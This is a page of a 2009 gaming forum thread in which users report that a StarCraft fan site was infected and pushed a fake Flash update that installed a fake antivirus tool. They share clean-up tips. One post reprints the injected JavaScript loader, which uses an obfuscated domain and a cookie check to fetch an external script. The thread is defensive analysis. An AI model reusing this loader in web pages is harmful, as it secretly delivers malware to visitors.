• Log InLog In
  • Register
Liquid`
Team Liquid Liquipedia
EDT 00:09
CEST 06:09
KST 13:09
  • Home
  • Forum
  • Calendar
  • Streams
  • Liquipedia
  • Features
  • Store
  • EPT
  • TL+
  • StarCraft 2
  • Brood War
  • Smash
  • Heroes
  • Counter-Strike
  • Overwatch
  • Liquibet
  • Fantasy StarCraft
  • TLPD
  • StarCraft 2
  • Brood War
  • Blogs
Forum Sidebar
Events/Features
News
Featured News
Serral wins HomeStory Cup 2914Serral wins Maestros of the Game 243ByuL, and the Limitations of Standard Play3Team Liquid Map Contest #22: Results and Winners7Code S Season 2 (2026): RO4 and Finals Preview12
Community News
Balance hotfix patch 5.0.16b (July 16)38Reynor: GSL Loss Wasn't About Preparation Format16[IPSL] Spring 2026 Grand Finals - This Weekend!5Weekly Cups (July 6 - 12): Protoss strike back12BSL Season 22 Full Overview & Conclusion8
StarCraft 2
General
Balance hotfix patch 5.0.16b (July 16) [D] Wireframe Casting Removed Clem: "I don't have that much hope in Blizzard" Reynor: GSL Loss Wasn't About Preparation Format Is the larve respawn broken?
Tourneys
Master Swan Open (Global Bronze-Master 2) WardiTV Summer Cup 2026 GSL CK #5 Race War RSL Revival: Season 6 - Qualifiers and Main Event HomeStory Cup 29
Strategy
[G] Having the right mentality to improve
Custom Maps
New Map Maker - Looking for Advice - Love or Hate Work In Progress Melee Maps [D]RTS in all its shapes and glory <3
External Content
The PondCast: SC2 News & Results Mutation # 534 Burning Evacuation Mutation # 533 Die Together Mutation # 532 Nuclear Family
Brood War
General
Pros Debate: Zerg Unfairly Nerfed? (ASL S22 map) Etiquete rules in Asl? BW General Discussion Recent recommended BW games Recommended FPV games (post-KeSPA)
Tourneys
[Megathread] Daily Proleagues Escore Tournament - Season 3 Small VOD Thread 2.0 [IPSL] Spring 2026 Grand Finals - This Weekend!
Strategy
Fighting Spirit mining rates Simple Questions, Simple Answers Creating a full chart of Zerg builds Relatively freeroll strategies
Other Games
General Games
General RTS Discussion Thread Path of Exile Nintendo Switch Thread Beyond All Reason Stormgate/Frost Giant Megathread
Dota 2
Looking for a Dota Mentor Official 'what is Dota anymore' discussion
League of Legends
Heroes of the Storm
Simple Questions, Simple Answers Heroes of the Storm 2.0
Hearthstone
Deck construction bug
TL Mafia
TL Mafia Power Rank NeO.D_StephenKing vs This Guy From 1 Million Dance TL Mafia Community Thread Vanilla Mini Mafia
Community
General
US Politics Mega-thread The Games Industry And ATVI Russo-Ukrainian War Thread UK Politics Mega-thread YouTube Thread
Fan Clubs
The IdrA Fan Club The HerO Fan Club!
Media & Entertainment
Movie Discussion! Anime Discussion Thread [Req][Books] Good Fantasy/SciFi books Series you have seen recently...
Sports
2024 - 2026 Football Thread MLB/Baseball 2023 McBoner: A hockey love story Tennis[sport] Formula 1 Discussion
World Cup 2022
Tech Support
Simple Questions Simple Answers FPS when play League Of Legend on laptop How to clean a TTe Thermaltake keyboard?
TL Community
Northern Ireland Global Starcraft The Automated Ban List
Blogs
Poker (part 2)
Nebuchad
The Experiences We Want and …
TrAiDoS
An Exploration of th…
waywardstrategy
ramps on octagon
StaticNine
Funny Nicknames
LUCKY_NOOB
Evil Gacha Games and the…
ffswowsucks
StarCraft improvement
iopq
Customize Sidebar...

Website Feedback

Closed Threads



Active: 7078 users

ScForAll unsafe... - Page 3

Forum Index > BW General
Post a Reply
Prev 1 2 3 4 5 Next All
ghermination
Profile Blog Joined April 2008
United States2851 Posts
Last Edited: 2009-09-26 22:17:38
September 26 2009 22:12 GMT
#41
I visited earlier, ignored the attack site warnings. I didn't download anything because i'm not retarded but that didn't seem to spontanteously get me a virus so it seems one could still surf the site as long as they don't download anything.

http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644

While reading the "there is nothing wrong with the site" news post, i noticed this:

+ Show Spoiler +

Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong.


apparently there are quite a few gaping security holes in scforall.com
U Gotta Skate.
Amarxist
Profile Blog Joined July 2008
United States371 Posts
September 26 2009 22:51 GMT
#42
I'm glad I run flash-block and no-script. I only allow javascript to run based on a whitelist. Anything new that comes up just doesn't run at all.
☺ ☻
piratebay
Profile Blog Joined April 2009
United States399 Posts
September 26 2009 22:55 GMT
#43
this just proves that TL is a better sight than scforall~~ haha

on a more serious note, i shall d/l the file to spite my university~
Rebuke[SkyNet]
Profile Joined September 2009
18 Posts
September 26 2009 23:01 GMT
#44
this site is def. not secure to visit yet, just letting you guys know. this has come to my attention about 3 months ago and ever since then i never touched the website, artosis/whoever need to take action asap. my computer won't even let me go to the site because its so dangerous
Cocaine isn't a habit, its a lifestyle.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 26 2009 23:47 GMT
#45
Glad I'm not the only one who had this problem. If you get the Total Security 2009 bullshit I got, you can just rename taskmgr.exe in system32 to iexplore.exe(the only program you can open) and end the task and then remove the virus.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
OmniKnight
Profile Joined August 2008
United States73 Posts
September 27 2009 00:05 GMT
#46
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
sashkata
Profile Joined September 2008
Bulgaria3241 Posts
September 27 2009 00:10 GMT
#47
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
Foucault
Profile Blog Joined May 2009
Sweden2826 Posts
September 27 2009 00:14 GMT
#48
Yeah I don't really trust scforall right now either. I had some weird virus thing pop up on that site, like it was hi-jacked or something
I know that deep inside of you there's a humongous set of testicles just waiting to pop out. Let 'em pop bro. //////////////////// AKA JensOfSweden // Lee Yoon Yeol forever.
KizZBG
Profile Blog Joined November 2006
u gotta skate8152 Posts
September 27 2009 00:20 GMT
#49
Similar thing happened to me the other day where I was asked to download some .pdf or something which I just ignored. Thankfully it didn't to anything to my system lol.

On September 27 2009 04:47 SonuvBob wrote:
Show nested quote +
On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.

Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.

PuertoRican?
eSTRO for life | #2 Sea.Really fan! | #1 GosI[Flying] fan! | Clide - best SC2 terran!
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 01:27 GMT
#50
Website is 100% infected. Confirmed using Virtual Machine.

The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled.

Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe

After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security

Code:
+ Show Spoiler +

<script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script>


Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools.


----

Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone.
When you do something right, people wont notice youve done anything at all.
Manifesto7
Profile Blog Joined November 2002
Osaka27174 Posts
September 27 2009 01:43 GMT
#51
I blame this on the LastShadow interview.
ModeratorGodfather
Nytefish
Profile Blog Joined December 2007
United Kingdom4282 Posts
Last Edited: 2009-09-27 01:49:07
September 27 2009 01:48 GMT
#52
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


I avoided it because I was too lazy to get an update.
It's not that stupid to fall for something that looks like a flash player update.
No I'm never serious.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 27 2009 02:12 GMT
#53
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


Next time I'll use repel.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
Tsagacity
Profile Blog Joined August 2005
United States2124 Posts
September 27 2009 02:13 GMT
#54
Wow. Now when I visit this site firefox gives me a preload page warning me that it's an attack site :O
"Everyone worse than me at video games is a noob. Everyone better than me doesn't have a life."
Catch]22
Profile Blog Joined July 2009
Sweden2683 Posts
Last Edited: 2009-09-27 02:15:11
September 27 2009 02:13 GMT
#55
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 02:26 GMT
#56
so how do I check if I got infected, and how do i treat it?


Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist.

Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it.
When you do something right, people wont notice youve done anything at all.
SpiritWolf
Profile Joined July 2008
United States127 Posts
Last Edited: 2009-09-27 02:27:13
September 27 2009 02:26 GMT
#57
On September 27 2009 11:13 Catch]22 wrote:
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site


I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine.
Initial_H.C.
Profile Blog Joined September 2008
Canada560 Posts
September 27 2009 03:10 GMT
#58
On September 27 2009 09:10 sashkata wrote:
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.


Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it.
JohnColtrane
Profile Blog Joined July 2008
Australia4813 Posts
September 27 2009 03:14 GMT
#59
Do we know when this virii shit started happening on SCforall? because ive been on their site a little while ago and never got any fake adobe updates (or real adobe updates for that matter.)

i'm pretty sure it was within september
HEY MEYT
R1CH
Profile Blog Joined May 2007
Netherlands10342 Posts
Last Edited: 2009-09-27 03:25:49
September 27 2009 03:21 GMT
#60
It's always been happening, check the site history. That's what happens when you depend on too many remote includes (or have exploits in your site).

Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009
Google reported badware activity on scforall.com/forums/ on Mar 5th 2009
Google reported badware activity on scforall.com/news/ on Mar 5th 2009
Google reported badware activity on scforall.com/prog/ on Mar 5th 2009
Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009
Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009
Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008
AdministratorTwitter: @R1CH_TL
TL+ Member
Prev 1 2 3 4 5 Next All
Please log in or register to reply.
Live Events Refresh
Replay Cast
00:00
Crank Gathers S4: Group Stage
LiquipediaDiscussion
PSISTORM Gaming Misc
23:00
FSL playoffsTeamLeague STvsASH
Liquipedia
[ Submit Event ]
Live Streams
Refresh
StarCraft 2
WinterStarcraft500
RuFF_SC2 203
trigger 68
FoxeR 42
SortOf 31
StarCraft: Brood War
Leta 961
Noble 43
Icarus 9
Dewaltoss 6
Dota 2
NeuroSwarm172
League of Legends
JimRising 709
Counter-Strike
summit1g9784
Super Smash Bros
Mew2King331
Heroes of the Storm
Trikslyr48
Other Games
PiGStarcraft429
ViBE181
XaKoH 128
Organizations
Other Games
gamesdonequick2503
StarCraft: Brood War
Afreeca ASL 1274
UltimateBattle 100
StarCraft 2
Blizzard YouTube
StarCraft: Brood War
BSLTrovo
[ Show 14 non-featured ]
StarCraft 2
• Hupsaiya 86
• AfreecaTV YouTube
• intothetv
• Kozan
• IndyKCrew
• LaughNgamezSOOP
• Migwel
• sooper7s
StarCraft: Brood War
• RayReign 15
• BSLYoutube
• STPLYoutube
• ZZZeroYoutube
League of Legends
• Stunt270
Other Games
• Scarra1728
Upcoming Events
RSL Revival
4h 51m
Clem vs Lambo
Scarlett vs Cure
CranKy Ducklings
5h 51m
Epic.LAN
8h 51m
IPSL
11h 51m
Dragon vs Hawk
RSL Revival
1d 4h
Classic vs Trap
herO vs SHIN
Sparkling Tuna Cup
1d 5h
OSC
1d 8h
IPSL
1d 11h
Bonyth vs Ret
WardiTV Weekly
2 days
Monday Night Weeklies
2 days
[ Show More ]
PiGosaur Cup
3 days
The PondCast
4 days
Replay Cast
5 days
CrankTV Team League
5 days
Replay Cast
5 days
CrankTV Team League
6 days
Korean StarCraft League
6 days
Liquipedia Results

Completed

Escore Tournament S3: W3
HSC XXIX
Eternal Conflict S2 E2

Ongoing

IPSL Spring 2026
Acropolis #4
YSL S3
CSL 2026 Summer (S21)
KCM Race Survival 2026 Season 3
ASL S22 SEASON OPEN Day 1
RSL Revival: Season 6
CranK Gathers Season 4: BW vs SC2 Team League
SCTL 2026 Spring
Stake Ranked Episode 3
XSE Pro League 2026
IEM Cologne Major 2026
Stake Ranked Episode 2
CS Asia Championships 2026
Asian Champions League 2026
IEM Atlanta 2026
PGL Astana 2026

Upcoming

Escore Tournament S3: W4
ASL S22 SEASON OPEN Day 2
Escore Tournament S3: W5
CSLAN 4
Blizzard Classic Cup 2026
HSC XXX
SC4ALL II: StarCraft II
Kung Fu Cup 2026 Grand Finals
Light Tournament 2026
Eternal Conflict S2 Finale
Eternal Conflict S2 E3
Logitech G Connect 2026
StarSeries Fall 2026
FISSURE Playground #5
BLAST Open Fall 2026
Esports World Cup 2026
BLAST Bounty Summer 2026
BLAST Bounty Summer Qual
TLPD

1. ByuN
2. TY
3. Dark
4. Solar
5. Stats
6. Nerchio
7. sOs
8. soO
9. INnoVation
10. Elazer
1. Rain
2. Flash
3. EffOrt
4. Last
5. Bisu
6. Soulkey
7. Mini
8. Sharp
Sidebar Settings...

Advertising | Privacy Policy | Terms Of Use | Contact Us

Original banner artwork: Jim Warren
The contents of this webpage are copyright © 2026 TLnet. All Rights Reserved.